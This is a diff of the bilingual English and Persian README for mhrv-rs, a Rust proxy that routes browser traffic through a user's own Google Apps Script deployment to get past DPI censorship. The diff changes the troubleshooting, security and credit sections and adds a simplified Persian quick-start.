+**YouTube videos don't play.** YouTube's video chunks come from `googlevideo.com`, which Apps Script can't reach (Google blocks Apps Script from accessing Google's own video CDN). The page itself loads fine; only video playback is affected. Fix: Full Tunnel + VPS, or add `.googlevideo.com` to `passthrough_hosts` in your config (browser hits it directly, but on Iran ISPs it's still throttled).
 
-- **HTTP/2 multiplexing** — the `h2` crate state machine (stream IDs, flow control, GOAWAY) has too many subtle hang cases; coalescing + 20-connection pool already gets most of the benefit for this workload.
-- **Request batching (`q:[...]` mode)** — our connection pool + tokio async already parallelizes well; batching adds ~200 lines of state management with unclear incremental gain.
-- **Range-based parallel download** — edge cases (non-Range servers, chunked mid-stream, content-encoding) are real; YouTube-style video already bypasses Apps Script via SNI-rewrite tunnel.
-- **Other modes** (`domain_fronting`, `google_fronting`, `custom_domain`) — Cloudflare killed generic domain fronting in 2024; Cloud Run needs a paid plan. Skip unless specifically requested.
+**ChatGPT / Claude / Grok shows a Cloudflare CAPTCHA.** Cloudflare flags Google datacenter IPs as bots. Fix: set up an **exit node** — a small TypeScript handler you deploy on a serverless host (Deno Deploy, fly.io, your own VPS) that bridges Apps Script → your exit node → claude.ai. See [`assets/exit_node/README.md`](assets/exit_node/README.md).
 
-## Known limitations
+**Telegram is unstable.** Telegram uses MTProto, which Apps Script doesn't speak. Pair with [xray](https://github.com/XTLS/Xray-core) on your machine — see [Telegram via xray in the full guide](docs/guide.md#telegram-via-xray).
 
-These are inherent to the Apps Script + domain-fronting approach, not bugs in this client. The original Python version has the same issues.
+**ISP blocks `script.google.com` itself.** mhrv-rs has a `direct` mode that uses only the SNI-rewrite tunnel (no Apps Script). Use it once to access `script.google.com` to deploy your script, then switch to apps_script mode. See [direct mode](docs/guide.md#direct-mode).
 
-- **User-Agent is fixed to `Google-Apps-Script`** for anything going through the relay. `UrlFetchApp.fetch()` does not allow overriding it. Consequence: sites that detect bots (e.g., Google search, some CAPTCHA flows) serve degraded / no-JS fallback pages to relayed requests. Workaround: add the affected domain to the `hosts` map so it's routed through the SNI-rewrite tunnel with your real browser's UA instead. `google.com`, `youtube.com`, `fonts.googleapis.com` are already there by default.
-- **Video playback is slow and quota-limited** for anything that goes through the relay. YouTube HTML loads through the tunnel (fast), but chunks from `googlevideo.com` go through Apps Script. Each Apps Script consumer account has a ~2 M `UrlFetchApp` calls/day quota and a 50 MB body limit per fetch. Fine for text browsing, painful for 1080p. Rotate multiple `script_id`s for more headroom, or use a real VPN for video.
-- **Brotli is stripped** from forwarded `Accept-Encoding` headers. Apps Script can decompress gzip, but not `br`, and forwarding `br` produces garbled responses. Minor size overhead.
-- **WebSockets don't work** through the relay — it's single request/response JSON. Sites that upgrade to WS fail (ChatGPT streaming, Discord voice, etc.).
-- **HSTS-preloaded / hard-pinned sites** will reject the MITM cert. Most sites are fine because the CA is trusted; a handful aren't.
-- **Google / YouTube 2FA and sensitive logins** may trigger "unrecognized device" warnings because requests originate from Google's Apps Script IPs, not yours. Log in once via the tunnel (`google.com` is in the rewrite list) to avoid this.
+**My Google search shows up without JavaScript.** The Apps Script `User-Agent` is fixed to `Google-Apps-Script` (Google won't let scripts change it), so some sites serve a no-JS fallback. Workaround: add the affected domain to your `hosts` map so it goes through the SNI-rewrite tunnel with your real browser User-Agent. `google.com`, `youtube.com`, `fonts.googleapis.com` are already on this list by default.
 
-## Security posture
+**More questions:** [full FAQ in the long guide](docs/guide.md#faq).
 
-- The MITM root stays **on your machine only**. The `ca/ca.key` private key is generated locally and never leaves the user-data dir.
-- `auth_key` between the client and the Apps Script relay is a shared secret you pick. The server-side `Code.gs` rejects requests without a matching key.
-- Traffic between your machine and Google's edge is standard TLS 1.3.
-- What Google can see: the destination URL and headers of each request (because Apps Script fetches on your behalf). This is the same trust model as any hosted proxy — if that's not acceptable, use a self-hosted VPN instead.
-- **IP exposure caveat (`apps_script` mode):** v1.2.9 strips every `X-Forwarded-For` / `X-Real-IP` / `Forwarded` / `Via` / `CF-Connecting-IP` / `True-Client-IP` / `Fastly-Client-IP` and ~10 related identity-revealing headers from your outbound request before it reaches Apps Script (issue #104). What this **does not** cover: whatever Google's own infrastructure may add when its Apps Script runtime makes the subsequent `UrlFetchApp.fetch()` to the target site. That second leg is server-side, outside this client's control — so the destination server sees a Google datacenter IP, but there is no public guarantee Google never propagates the original caller's IP in some internal header chain. If your threat model requires that the destination site cannot under any circumstances learn your IP, **use Full Tunnel mode** (traffic exits from your own VPS, only the VPS IP is exposed end-to-end). `apps_script` mode remains fine for bypassing DPI / reaching blocked sites where "seen by Google" is acceptable. Raised in [#148](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/148).
+## Need help?
 
-## License
+- Search [open and closed issues](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues?q=is%3Aissue) — your problem might already be answered
+- Open a [new issue](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/new) with: your config (mask `auth_key`!), exactly what you tried, exactly what you saw in the log
 
-MIT. See [LICENSE](LICENSE).
+## Credits
 
-## Credit
+Original project: **[@masterking32/MasterHttpRelayVPN](https://github.com/masterking32/MasterHttpRelayVPN)**. The idea, the Apps Script protocol, the proxy architecture — all his. This Rust port exists to make client-side distribution easier (single binary, no Python install).
 
-Original project: <https://github.com/masterking32/MasterHttpRelayVPN> by [@masterking32](https://github.com/masterking32). The idea, the Google Apps Script protocol, the proxy architecture, and the ongoing maintenance are all his. This Rust port exists purely to make client-side distribution easier.
+Most of the Rust code in this port was written with [Anthropic's Claude](https://claude.com), reviewed by a human on every commit.
 
 ## Support this project
 
-If `mhrv-rs` has been useful to you and you'd like to support continued development:
-
-### [❤️ Support on sh1n.org](https://sh1n.org/donate)
-
-Donations cover hosting, self-hosted CI runner costs, and continued maintenance. Starring the repo also helps signal that the project is worth keeping alive.
+[❤️ Donate at sh1n.org](https://sh1n.org/donate) — covers hosting and CI runner costs. Starring the repo also helps signal the project is worth keeping alive.
 
 ---
 
 <div dir="rtl">
 
-## راهنمای فارسی
-
-### این ابزار چیست؟
-
-یک پروکسی کوچک که روی سیستم خودتان اجرا می‌شود و ترافیک شما را از طریق یک اسکریپت رایگان که در حساب گوگل خودتان می‌سازید، عبور می‌دهد. `ISP` شما فقط یک اتصال `HTTPS` ساده به `www.google.com` می‌بیند و اجازه می‌دهد رد شود؛ در پشت پرده، اسکریپتی که خودتان منتشر می‌کنید سایت مقصد را برای شما می‌خواند و پاسخ را بازمی‌گرداند.
-
-این نسخهٔ `Rust` از پروژهٔ اصلی [MasterHttpRelayVPN](https://github.com/masterking32/MasterHttpRelayVPN) اثر [@masterking32](https://github.com/masterking32) است. **تمام اعتبار ایده و نسخهٔ اصلی پایتون برای ایشان است.** این پورت همان روش را در قالب یک فایل اجرایی تک‌پارچه (~۳ مگابایت) بدون نیاز به نصب پایتون یا هیچ وابستگی دیگری ارائه می‌دهد.
-
-> **نکتهٔ مهم دربارهٔ نویسندگی:** بیشتر کدِ این پورت `Rust` با کمک [Claude](https://claude.com) شرکت Anthropic نوشته شده و روی هر commit توسط انسان بازبینی شده است. اگر باگی دیدید یا پیشنهادی دارید، لطفاً در [صفحهٔ issues](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues) گزارش دهید.
-
-### برای چه کسی مفید است؟
-
-- کسانی که در شبکه‌های تحت سانسور قوی (مثل ایران) زندگی می‌کنند
-- کسی که می‌خواهد بدون `VPN` تجاری، بدون نصب پایتون، و بدون پرداخت پول عبور کند
-- کسی که حتی یک حساب گوگل رایگان دارد
-
-### چه چیز لازم دارید؟
-
-۱. یک حساب گوگل (همان `Gmail` رایگان کافیست)  
-۲. مرورگر (`Firefox`، `Chrome`، `Edge`، …) یا برنامه‌ای که `HTTP proxy` یا `SOCKS5` قبول کند  
-۳. دسترسی به سیستم خودتان (مک / لینوکس / ویندوز)  
-
-### پنج مرحله برای راه‌اندازی
-
-#### مرحلهٔ ۱ — ساخت اسکریپت در گوگل (فقط یک بار)
-
-۱. به <https://script.google.com> بروید و با حساب گوگل خودتان وارد شوید  
-۲. روی **`New project`** کلیک کنید و کد پیش‌فرض را پاک کنید  
-۳. محتوای فایل [`Code.gs`](https://github.com/masterking32/MasterHttpRelayVPN/blob/python_testing/apps_script/Code.gs) را از ریپوی اصلی کپی کنید و داخل ویرایشگر بچسبانید. اگر به آدرس بالا دسترسی ندارید، یک کپی از همین فایل داخل این ریپو هم هست: [`assets/apps_script/Code.gs`](assets/apps_script/Code.gs)  
-۴. بالای کد، خط `const AUTH_KEY = "..."` را پیدا کنید و مقدار آن را به یک رمز قوی و خاص خودتان تغییر دهید (یک رشتهٔ تصادفی حداقل ۱۶ کاراکتری کافی است، مثلاً `aK8f3xM9pQ2nL5vR`)  
-۵. روی دکمهٔ آبی **`Deploy`** در بالا سمت راست کلیک کنید و **`New deployment`** را بزنید  
-۶. **`Type`** را روی **`Web app`** بگذارید و این تنظیمات را اعمال کنید:  
-- **`Execute as`**: **`Me`**  
-- **`Who has access`**: **`Anyone`**
-
-۷. روی **`Deploy`** کلیک کنید. گوگل یک **`Deployment ID`** نشان می‌دهد — رشتهٔ طولانی تصادفی که داخل آدرس `URL` است. کپی‌اش کنید؛ در برنامه لازم دارید  
-
-> **نکته:** اگر نمی‌دانید رمز `AUTH_KEY` چه بگذارید، یک رشتهٔ تصادفی ۱۶ تا ۲۴ کاراکتری بسازید. مهم فقط این است که **دقیقاً همان رشته** را در برنامه هم وارد کنید.
-
-#### به `script.google.com` هم دسترسی ندارید؟
-
-اگر `ISP` شما از قبل `Apps Script` (یا کل گوگل) را مسدود کرده، برای مرحلهٔ ۱ باید مرورگرتان **اول** به `script.google.com` برسد — قبل از اینکه رله‌ای داشته باشید. `mhrv-rs` یک حالت بوت‌استرپ کوچک دقیقاً برای همین دارد: `google_only`.
-
-۱. برنامه را طبق مرحلهٔ ۲ پایین دانلود کنید
-
-۲. فایل [`config.google-only.example.json`](config.google-only.example.json) را در کنار فایل اجرایی به نام `config.json` کپی کنید — نه `script_id` لازم دارد و نه `auth_key`
-
-۳. برنامه را اجرا کنید و `HTTP proxy` مرورگرتان را روی `127.0.0.1:8085` تنظیم کنید
-
-۴. در حالت `google_only`، پروکسی فقط `*.google.com`، `*.youtube.com` و بقیهٔ میزبان‌های لبهٔ گوگل را از طریق همان تونل بازنویسی `SNI` رد می‌کند. بقیهٔ ترافیک مستقیم می‌رود — هنوز رله‌ای در کار نیست
-
-۵. حالا مرحلهٔ ۱ را در مرورگر انجام دهید (اتصال به `script.google.com` با `SNI` فرونت می‌شود). `Code.gs` را مستقر کنید و `Deployment ID` را کپی کنید
-
-۶. در `UI` دسکتاپ یا اندروید (یا با ویرایش `config.json`) حالت را به `apps_script` برگردانید، `Deployment ID` و `auth_key` را بچسبانید و برنامه را دوباره راه‌اندازی کنید
-
-برای بررسی قابلیت دسترسی قبل از راه‌اندازی پروکسی: دستور `mhrv-rs test-sni` دامنه‌های `*.google.com` را مستقیماً تست می‌کند و فقط به `google_ip` و `front_domain` نیاز دارد.
-
-#### مرحلهٔ ۲ — دانلود برنامه
-
-به [صفحهٔ Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases) بروید و آرشیو مناسب سیستم‌عامل خود را دانلود و از حالت فشرده خارج کنید:
-
-| سیستم‌عامل | فایل مناسب |
-|---|---|
-| مک اپل‌سیلیکون (`M1` / `M2` / …) | `mhrv-rs-macos-arm64-app.zip` (قابل دوبار کلیک در `Finder`) |
-| مک اینتل | `mhrv-rs-macos-amd64-app.zip` |
-| ویندوز | `mhrv-rs-windows-amd64.zip` |
-| لینوکس معمولی (اوبونتو، مینت، دبیان، فدورا، آرچ، …) | `mhrv-rs-linux-amd64.tar.gz` |
-| لینوکس روی روتر (`OpenWRT`) یا `Alpine` | `mhrv-rs-linux-musl-amd64.tar.gz` |
-
-> اگر نمی‌دانید مک شما `M1/M2` است یا اینتل: منوی اپل → `About This Mac` → در خط **`Chip`** اگر **`Apple`** نوشته شده، `arm64` بگیرید؛ اگر **`Intel`**، `amd64`.  
-
-> کاربران اوبونتو ۲۰.۰۴ یا سیستم‌های خیلی قدیمی که خطای `GLIBC not found` می‌گیرند: آرشیو `linux-musl-amd64` را دانلود کنید — اجرا می‌شود.  
-#### مرحلهٔ ۳ — اجرای بار اول (نصب گواهی محلی)
-
-برای اینکه برنامه بتواند ترافیک `HTTPS` مرورگر شما را باز کند و از طریق `Apps Script` رد کند، یک گواهی امنیتی کوچک **روی سیستم خودتان** می‌سازد و به سیستم‌عامل می‌گوید به آن اعتماد کند.
-
-**کاری که باید بکنید (خودکار است):**
+# mhrv-rs — دور زدن سانسور به‌رایگان، با حساب گوگل خودت
 
-| سیستم‌عامل | روش |
-|---|---|
-| مک | روی `run.command` دو بار کلیک کنید |
-| ویندوز | روی `run.bat` دو بار کلیک کنید |
-| لینوکس | در ترمینال دستور `./run.sh` را اجرا کنید |
-
-**فقط یک بار** رمز سیستم (`sudo` در مک/لینوکس یا `UAC` در ویندوز) می‌خواهد تا گواهی را نصب کند. بعد از آن برنامه باز می‌شود و در اجراهای بعدی می‌توانید مستقیماً از فایل اصلی (`mhrv-rs.app` در مک، `mhrv-rs-ui.exe` در ویندوز) استفاده کنید.
-
-**امنیت این گواهی:**
-
-- گواهی **کاملاً روی سیستم شما** ساخته می‌شود. کلید خصوصی هیچ‌وقت از کامپیوترتان خارج نمی‌شود
-- هیچ سرور راه دوری — از جمله خود گوگل — نمی‌تواند با این گواهی خودش را جای سایت‌ها جا بزند
-- هر وقت خواستید می‌توانید گواهی را حذف کنید (بخش **[حذف گواهی](#سوالات-رایج)** را ببینید)
-
-> **اگر نمی‌خواهید از اسکریپت راه‌انداز استفاده کنید**، می‌توانید مرحلهٔ گواهی را دستی انجام دهید:
->
-> - مک/لینوکس: `sudo ./mhrv-rs --install-cert`
-> - ویندوز (با `Run as administrator`): `mhrv-rs.exe --install-cert`
-
-#### مرحلهٔ ۴ — تنظیمات در برنامه
-
-پنجرهٔ برنامه باز می‌شود. این فیلدها را پر کنید:
-
-| فیلد | مقدار |
-|---|---|
-| **`Apps Script ID(s)`** | همان `Deployment ID` مرحلهٔ ۱ را paste کنید |
-| **`Auth key`** | همان رمز `AUTH_KEY` که داخل `Code.gs` گذاشتید |
-| **`Google IP`** | پیش‌فرض `216.239.38.120` معمولاً خوب است. دکمهٔ `scan` کنارش IPهای دیگر گوگل را تست می‌کند و سریع‌ترین را نشان می‌دهد |
-| **`Front domain`** | پیش‌فرض `www.google.com` را نگه دارید |
-| **`HTTP port`** / **`SOCKS5 port`** | پیش‌فرض‌های `8085` و `8086` خوب‌اند |
-
-بعد روی **`Save config`** و سپس **`Start`** کلیک کنید. هر وقت خواستید وضعیت را تست کنید، دکمهٔ **`Test`** را بزنید — یک درخواست کامل می‌فرستد و نتیجه را نشان می‌دهد.
+**یک برنامهٔ کوچک که روی کامپیوترت اجرا می‌شود و کمک می‌کند سایت‌های مسدودشده را با یک اسکریپت رایگان که توی حساب گوگل خودت می‌سازی، باز کنی. ISP فقط می‌بیند که داری به `www.google.com` وصل می‌شوی — نمی‌فهمد در واقع چه سایتی را باز کرده‌ای.**
 
-#### مرحلهٔ ۵ — تنظیم مرورگر یا اپلیکیشن
+🇬🇧 [English Quick Start](#quick-start) · [Full Guide (advanced)](docs/guide.md)
+🇮🇷 [راه‌اندازی سریع](#راه‌اندازی-سریع) · [راهنمای کامل (پیشرفته)](docs/guide.fa.md)
 
-برنامه روی دو پورت منتظر است:
+## چی به دست می‌آوری
 
-- **`HTTP proxy`** روی `127.0.0.1:8085` — برای مرورگرها
-- **`SOCKS5 proxy`** روی `127.0.0.1:8086` — برای تلگرام / `xray` / بقیهٔ اپلیکیشن‌ها
+- 🌐 **عبور از DPI / مسدودسازی SNI** با لبهٔ گوگل به‌عنوان رله
+- 💯 **کاملاً رایگان** — روی سهمیهٔ رایگان حساب گوگل خودت
+- ⚡ **یک فایل کوچک** (~۳ مگابایت)، بدون پایتون، بدون Node.js، بدون وابستگی
+- 🖥️ **روی** مک، ویندوز، لینوکس، اندروید، روتر OpenWRT کار می‌کند
+- 🦊 **هر مرورگر یا برنامه‌ای** که از HTTP proxy یا SOCKS5 پشتیبانی کند
 
-**فایرفاکس (ساده‌ترین):**
+## چطور کار می‌کند (تصویر ساده)
 
-
-#### پیکربندی scan-ips (اختیاری)
-به‌طور پیش‌فرض، دستور scan-ips از آرایه‌ای ثابت از IPها استفاده می‌کند.
-
-می‌توانید کشف پویای IP را با تنظیم fetch_ips_from_api روی true در config.json فعال کنید:
-
-```json
-{
-  "fetch_ips_from_api": true,
-  "max_ips_to_scan": 100,
-  "scan_batch_size":100,
-  "google_ip_validation": true // برسی هدر های بازگشته از ایپی برای برسی هدر ها و تشخیص کاربردی بودن ایپی
-}
 ```
-
-زمانی که فعال باشد:
-
-- فایل goog.json را از API محدوده‌های عمومی IP گوگل دریافت می‌کند
-تمام CIDRها را استخراج کرده و به IPهای جداگانه تبدیل می‌کند
-- به IPهای دامنه‌های معروف گوگل (google.com، youtube.com و غیره) اولویت می‌دهد
-به‌صورت تصادفی تا max_ips_to_scan کاندید انتخاب می‌کند (ابتدا IPهای اولویت‌دار)
-فقط کاندیدهای انتخاب‌شده را برای اتصال و اعتبارسنجی frontend تست می‌کند.
-
-با استفاده از این گزینه‌ها ممکن است IPهایی پیدا کنید که سریع‌تر از آرایه ثابت پیش‌فرض هستند اما تضمینی وجود ندارد که این IPها کار کنند.
-
-#### ۵. تنظیم proxy در کلاینت
-۱. منوی `Settings` را باز کنید، در خانهٔ جست‌وجو عبارت `proxy` را تایپ کنید  
-۲. روی **`Network Settings`** کلیک کنید  
-۳. گزینهٔ **`Manual proxy configuration`** را انتخاب کنید  
-۴. در فیلد **`HTTP Proxy`** آدرس `127.0.0.1` و پورت `8085` را بگذارید  
-۵. تیک **`Also use this proxy for HTTPS`** را بزنید  
-۶. `OK`  
-**کروم یا Edge:** از تنظیمات `proxy` سیستم‌عامل استفاده می‌کنند. ساده‌ترین راه نصب افزونهٔ **`Proxy SwitchyOmega`** و تنظیم آن روی `127.0.0.1:8085` است.
-
-**تلگرام:**
-
-۱. `Settings` → `Advanced` → `Connection type`
-۲. **`Use custom proxy`** → **`SOCKS5`**
-۳. هاست `127.0.0.1`، پورت `8086`، نام کاربری و رمز را خالی بگذارید
-۴. `Save` بزنید
-
-> **نکتهٔ مهم دربارهٔ تلگرام:** اگر فقط این ابزار را استفاده کنید، تلگرام ممکن است مرتب قطع و وصل شود، چون `Apps Script` پروتکل `MTProto` تلگرام را نمی‌فهمد. برای پایداری کامل تلگرام، بخش [**تلگرام پایدار با xray**](#تلگرام-و-غیره--جفت-کردن-با-xray) را ببینید.
-
-### از کجا بفهمم کار می‌کند؟
-
-۱. در پنجرهٔ برنامه، وضعیت باید **`Status: running`** باشد (سبز رنگ)
-۲. دکمهٔ **`Test`** را بزنید — اگر سبز شد، سرویس سالم است
-۳. در مرورگر به <https://icanhazip.com> بروید — `IP` نمایش داده‌شده باید متفاوت از `IP` واقعی شما باشد (آی‌پی گوگل)
-۴. اگر مشکلی بود، پنل **`Recent log`** پایین برنامه را نگاه کنید
-
-### تلگرام و غیره — جفت کردن با xray
-
-‏ `Apps Script` فقط `HTTP` می‌فهمد، پس پروتکل‌های دیگر (مثل `MTProto` تلگرام، `IMAP` ایمیل، `SSH`، …) مستقیماً از آن رد نمی‌شوند. نتیجه: اگر `ISP` تلگرام را با `DPI` بلاک کرده باشد، همچنان بلاک است.  
-**راه‌حل:** یک [`xray`](https://github.com/XTLS/Xray-core) (یا `v2ray` یا `sing-box`) روی سیستم خودتان اجرا کنید که با `VLESS` / `Trojan` / `Shadowsocks` به یک سرور `VPS` شخصی وصل می‌شود. بعد در برنامهٔ `mhrv-rs`، فیلد **`Upstream SOCKS5`** را با آدرس `xray` پر کنید (مثلاً `127.0.0.1:50529`).
-
-بعد از این کار، ترافیکی که `HTTP` نیست (مثل تلگرام) از `xray` عبور می‌کند و به سرور شما می‌رسد. ترافیک `HTTP/HTTPS` مثل قبل از `Apps Script` می‌رود، پس مرورگر شما دست نخورده کار می‌کند.
-
-```json
-{
-  "upstream_socks5": "127.0.0.1:50529"
-}
+  تو  ←  مرورگر  ←  mhrv-rs  ──┐
+                                │ ISP فقط می‌بیند:  www.google.com
+                                ▼
+                         شبکهٔ گوگل
+                                │
+                                ▼
+            اسکریپت رایگان گوگل تو  سایت اصلی را  باز می‌کند
+                                │
+                                ▼
+              توییتر / ChatGPT / هر سایت مسدودی
 ```
 
-### ویرایشگر SNI pool
-
-به‌صورت پیش‌فرض برنامه بین چند نام گوگل می‌چرخد (`www.google.com`، `mail.google.com`، `drive.google.com`، `docs.google.com`، `calendar.google.com`) تا اثر انگشت ترافیک شما یکنواخت نباشد. اما بعضی از این نام‌ها گاهی در شبکهٔ شما بلاک می‌شوند — مثلاً `mail.google.com` در ایران چند بار هدف قرار گرفته.
-
-**برای بررسی و ویرایش:**
+ISP داخل HTTPS رمزشده را نمی‌تواند بخواند. فقط آدرس را می‌بیند — `www.google.com`. جست‌وجوی واقعی صفحه داخل شبکهٔ گوگل، در تونل رمزشده اتفاق می‌افتد.
 
-۱. روی دکمهٔ آبی **`SNI pool…`** در برنامه کلیک کنید
-۲. دکمهٔ **`Test all`** را بزنید — هر نام را تست می‌کند و نتیجه را کنارش نشان می‌دهد (`ok` یا `fail`)
-۳. دکمهٔ **`Keep working only`** را بزنید — همه نام‌هایی که پاسخ ندادند را غیرفعال می‌کند
-۴. اگر نام جدیدی می‌خواهید اضافه کنید، در کادر پایین نام را بنویسید و **`+ Add`** بزنید — خودکار تست می‌شود
-۵. با **`Save config`** در پنجرهٔ اصلی ذخیره کنید
+## راه‌اندازی سریع
 
-### حالت تونل کامل (Full tunnel mode)
+**حدود ۵ دقیقه.** نیاز داری به:
 
-حالت `"mode": "full"` **تمام** ترافیک را سرتاسر از طریق `Apps Script` و یک [tunnel-node](tunnel-node/) روی سرور شما عبور می‌دهد — **بدون نیاز به نصب گواهی `MITM`**. تنها هزینه‌اش تأخیر بیشتر است (هر بایت از مسیر `Apps Script → tunnel-node → مقصد` می‌رود)، اما برای هر پروتکل و هر برنامه بدون نصب `CA` کار می‌کند.
+- یک حساب گوگل رایگان (هر Gmail‌ای کار می‌کند)
+- یک کامپیوتر (مک، ویندوز یا لینوکس)
+- فایرفاکس یا کروم
 
-**سریع‌ترین راه راه‌اندازی `tunnel-node` روی `VPS`:** ایمیج آمادهٔ `Docker`:
+### مرحلهٔ ۱ — ساخت اسکریپت گوگل (یک‌بار)
 
-```bash
-docker run -d --name mhrv-tunnel --restart unless-stopped \
-  -p 8080:8080 -e TUNNEL_AUTH_KEY=رمز_قوی_شما \
-  ghcr.io/therealaleph/mhrv-tunnel-node:latest
-```
+۱. به **[script.google.com](https://script.google.com)** برو، با حساب گوگل خودت وارد شو
+۲. روی **New project** بالا سمت چپ کلیک کن
+۳. کد پیش‌فرض ویرایشگر را پاک کن
+۴. فایل [`assets/apps_script/Code.gs`](assets/apps_script/Code.gs) را در همین ریپو باز کن، همه‌اش را کپی کن، در ویرایشگر Apps Script پیست کن (جایگزین متن قبلی)
+۵. این خط را نزدیک بالای کد پیدا کن:
+   ```js
+   const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+   ```
+   مقدار `CHANGE_ME_TO_A_STRONG_SECRET` را با یک رشتهٔ تصادفی طولانیِ خودت عوض کن. **این رشته را نگه دار** — در مرحلهٔ ۳ داخل برنامه پیست می‌کنی. مثل پسورد محرمانه نگه‌اش دار.
+۶. روی 💾 **Save** کلیک کن (یا `Ctrl/Cmd+S`)
+۷. روی **Deploy** (بالا سمت راست) → **New deployment**
+۸. روی آیکون چرخ‌دندهٔ ⚙ کنار "Select type" کلیک کن → **Web app** را انتخاب کن
+۹. تنظیم کن:
+   - **Execute as:** *Me* (حساب گوگل خودت)
+   - **Who has access:** *Anyone*
+۱۰. **Deploy** را بزن. ممکن است گوگل برای دادن دسترسی سؤال کند — **Authorize access** را بزن و تأیید کن
+۱۱. گوگل یک **Deployment ID** نشانت می‌دهد (یک رشتهٔ تصادفی طولانی). **کپی‌اش کن** — در مرحلهٔ ۳ لازم داری.
 
-`multi-arch` (هم `linux/amd64` و هم `linux/arm64`)، اجرا با کاربر غیر `root`، حدود ۳۲ مگابایت فشرده. برای محیط production نسخهٔ مشخص (`:1.5.0`) را pin کنید. راهنمای کامل (شامل `Cloud Run`، `docker-compose`، و بیلد از سورس) در [`tunnel-node/README.md`](tunnel-node/README.md) هست.
+> **نکته:** اگر بعداً `Code.gs` را به‌روزرسانی کنی، Deployment جدید نساز. کد را ویرایش کن، بعد **Deploy → Manage deployments → ✏️ → Version: New version → Deploy**. Deployment ID همان قبلی می‌ماند.
 
-#### چرا تعداد `Deployment ID` مهم است؟
+### مرحلهٔ ۲ — دانلود mhrv-rs
 
-هر درخواست دسته‌ای (`batch`) به `Apps Script` حدود ۲ ثانیه طول می‌کشد. در حالت `full`، برنامه یک **لولهٔ موازی** (`pipeline`) اجرا می‌کند که چند درخواست دسته‌ای را همزمان می‌فرستد بدون اینکه منتظر پاسخ قبلی بماند. هر `Deployment ID` (= یک حساب گوگل) حوضچهٔ همزمانی مخصوص خودش با **۳۰ درخواست همزمان** دارد — مطابق سقف اجرای همزمان `Apps Script` به ازای هر حساب.
+به [صفحهٔ آخرین release](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) برو و فایل مناسب کامپیوترت را دانلود کن:
 
-```
-حداکثر همزمانی = ۳۰ × تعداد Deployment IDها
-```
+| سیستم تو | فایل دانلود |
+|---|---|
+| مک با تراشهٔ Apple Silicon (M1 / M2 / M3 / M4) | `mhrv-rs-macos-arm64-app.zip` |
+| مک با تراشهٔ Intel | `mhrv-rs-macos-amd64-app.zip` |
+| ویندوز | `mhrv-rs-windows-amd64.zip` |
+| لینوکس (Ubuntu / Mint / Fedora / Debian / Arch) | `mhrv-rs-linux-amd64.tar.gz` |
+| گوشی یا تبلت اندروید | `mhrv-rs-android-universal-v*.apk` |
+| روتر OpenWRT یا Alpine | `mhrv-rs-linux-musl-amd64.tar.gz` |
 
-| تعداد Deployment | درخواست‌های همزمان | |
-|-----------------|-------------------|---|
-| ۱ | ۳۰ | یک حساب — برای مرور سبک کافیست |
-| ۳ | ۹۰ | مناسب استفادهٔ روزانه |
-| ۶ | ۱۸۰ | توصیه‌شده برای استفادهٔ سنگین |
-| ۱۲ | ۳۶۰ | چند حساب — حداکثر توان |
+> **مک: مطمئن نیستی Apple Silicon است یا Intel؟** کلیک کن  → **About This Mac**. اگر "Chip" نوشت **Apple**، arm64 بگیر. اگر **Intel** بود، amd64.
 
-بیشتر `Deployment` = بیشتر همزمانی = تأخیر کمتر برای هر نشست. هر دسته بین `ID`ها چرخش می‌کند (`round-robin`)، پس بار به‌طور یکنواخت توزیع می‌شود.
+> **لینوکس: خطای `GLIBC` می‌گیری؟** به‌جای آن از `linux-musl-amd64` استفاده کن — روی هر لینوکسی بدون وابستگی کار می‌کند.
 
-### اجرا روی OpenWRT (روتر)
+از حالت فشرده دربیار.
 
-اگر می‌خواهید برنامه را روی روترتان اجرا کنید تا همهٔ دستگاه‌های شبکه از آن استفاده کنند، آرشیو `mhrv-rs-linux-musl-*.tar.gz` را دانلود کنید (این نسخه فایل اجرایی استاتیک دارد و بدون نصب هیچ وابستگی روی روتر کار می‌کند).
+### مرحلهٔ ۳ — اجرای اول
 
-```sh
-# از کامپیوتری که به روترتان دسترسی دارد:
-scp mhrv-rs root@192.168.1.1:/usr/bin/mhrv-rs
-scp mhrv-rs.init root@192.168.1.1:/etc/init.d/mhrv-rs
-scp config.json root@192.168.1.1:/etc/mhrv-rs/config.json
+روی فایل اجرا دو بار کلیک کن:
 
-# روی خود روتر (ssh کنید به روتر):
-chmod +x /usr/bin/mhrv-rs /etc/init.d/mhrv-rs
-/etc/init.d/mhrv-rs enable
-/etc/init.d/mhrv-rs start
-logread -e mhrv-rs -f
-```
+| مک | `run.command` |
+| ویندوز | `run.bat` |
+| لینوکس | `./run.sh` (در ترمینال) |
 
-در فایل `config.json`، مقدار `listen_host` را به `0.0.0.0` تغییر دهید تا روتر از همهٔ دستگاه‌های `LAN` اتصال بپذیرد. بعد در هر دستگاه، `HTTP proxy` را روی آی‌پی روتر پورت `8085` (یا `SOCKS5` روی `8086`) تنظیم کنید.
+اولین بار رمز کامپیوترت را می‌خواهد. این برای نصب یک گواهی کوچک است تا مرورگرت به mhrv-rs اعتماد کند. **گواهی روی کامپیوتر خودت ساخته می‌شود و هیچ‌وقت جایی ارسال نمی‌شود** — نه روی ابر، نه به گوگل، هیچ منبع راه‌دوری نمی‌تواند ازش استفاده کند.
 
-مصرف حافظه حدود ۱۵ تا ۲۰ مگابایت است — روی هر روتری با حداقل ۱۲۸ مگابایت `RAM` اجرا می‌شود.
+پنجرهٔ mhrv-rs باز می‌شود. این فیلدها را پر کن:
 
-### اجرا روی اندروید
+- **Apps Script ID(s)** ← **Deployment ID** از مرحلهٔ ۱ را پیست کن
+- **Auth key** ← همان رشتهٔ تصادفی که در `Code.gs` گذاشتی
+- بقیه را پیش‌فرض ول کن
 
-یک نسخهٔ اندروید هم داریم — همان `mhrv-rs` ولی داخل یک برنامهٔ `Compose` با پل `TUN` از طریق [`tun2proxy`](https://crates.io/crates/tun2proxy). تمام ترافیک دستگاه (مرورگر، تلگرام، هر برنامه‌ای) خودکار از پروکسی رد می‌شود، بدون نیاز به تنظیم per-app.
+روی **Save config** و بعد **Start** بزن. اگر کار کند، دایرهٔ وضعیت سبز می‌شود.
 
